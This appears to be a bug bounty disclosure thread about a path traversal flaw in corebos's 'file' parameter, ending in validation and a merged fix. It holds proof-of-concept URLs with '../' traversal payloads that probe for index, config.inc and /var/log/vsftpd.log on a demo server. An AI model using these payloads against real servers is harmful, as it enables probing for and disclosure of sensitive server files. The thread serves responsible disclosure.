PHP Remote File Inclusion in tsolucio/corebos

Valid

Reported on

Oct 31st 2021


Description

An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS).

Proof of Concept

// PoC.js

Link --> http://demo.corebos.com/index.php?module=Products&action=ProductsAjax&file=../../../../../../index&ajax=true%27&search=true&gname=&query=true&search_field=productname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=E&popuptype=detailview&form=EditView&forfield=&srcmodule=&forrecord=&select=enable&curr_row=0&productid=0&recordid=74%27&form=EditView&forfield=&srcmodule=%27&forrecord=&return_module=Accounts

Vulnerable Parameter --> file 

Impact

This vulnerability is capable of... exposing or running files on the web server.

Joe Bordes
a month ago

Maintainer


@shellinjector I can't reproduce this. I correctly get an invalid file error message. Can you make sure you indicated the link correctly?

Thanks

0x9x
a month ago

Researcher


Sorry for confusion !

Actually i'm completly banned from the server ! let me check when changing the IP ! i'm not using any specific tool to do more testings here . but as you can see there is an Error that shows the full path of the server . Anyways let me check it next time .

Thanks

Joe Bordes
a month ago

Maintainer


Ah, I understand now. The error is not that the file can be included/loaded/seen but that you can know if it exists or not, right?

It is a disclosure of information, not a remote file inclusion.

If that is the case I would ask you to reduce the severity and I will hide that information.

0x9x
a month ago

Researcher


Sure! you're right !

Exist file and readable --> index.php

Link --> http://demo.corebos.com/index.php?module=Products&action=ProductsAjax&file=/index&ajax=true%27&search=true&gname=&query=true&search_field=productname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=E&popuptype=detailview&form=EditView&forfield=&srcmodule=&forrecord=&select=enable&curr_row=0&productid=0&recordid=74%27&form=EditView&forfield=&srcmodule=%27&forrecord=&return_module=Accounts

Restriscted but exist --> config.inc & config

Link --> http://demo.corebos.com/index.php?module=Products&action=ProductsAjax&file=/config.inc&ajax=true%27&search=true&gname=&query=true&search_field=productname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=E&popuptype=detailview&form=EditView&forfield=&srcmodule=&forrecord=&select=enable&curr_row=0&productid=0&recordid=74%27&form=EditView&forfield=&srcmodule=%27&forrecord=&return_module=Accounts

Thanks,

0x9x
a month ago

Researcher


Other link ( full path of the server ) --> http://demo.corebos.com/index.php?module=Products&action=ProductsAjax&file=../../../../../../var/log/vsftpd.log&ajax=true&search=true&gname=&query=true&search_field=productname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=E&popuptype=detailview&form=EditView&forfield=&srcmodule=&forrecord=&select=enable&curr_row=0&productid=0&recordid=74&form=EditView&forfield=&srcmodule=%27&forrecord=&return_module=Accounts

Joe Bordes validated this vulnerability a month ago
0x9x has been awarded the disclosure bounty
The fix bounty is now up for grabs
0x9x
a month ago

Researcher


Thanks for your updates!

Joe Bordes confirmed that a fix has been merged on c05cdd a month ago
Joe Bordes has been awarded the fix bounty
Joe Bordes
a month ago

Maintainer


Thanks for your help!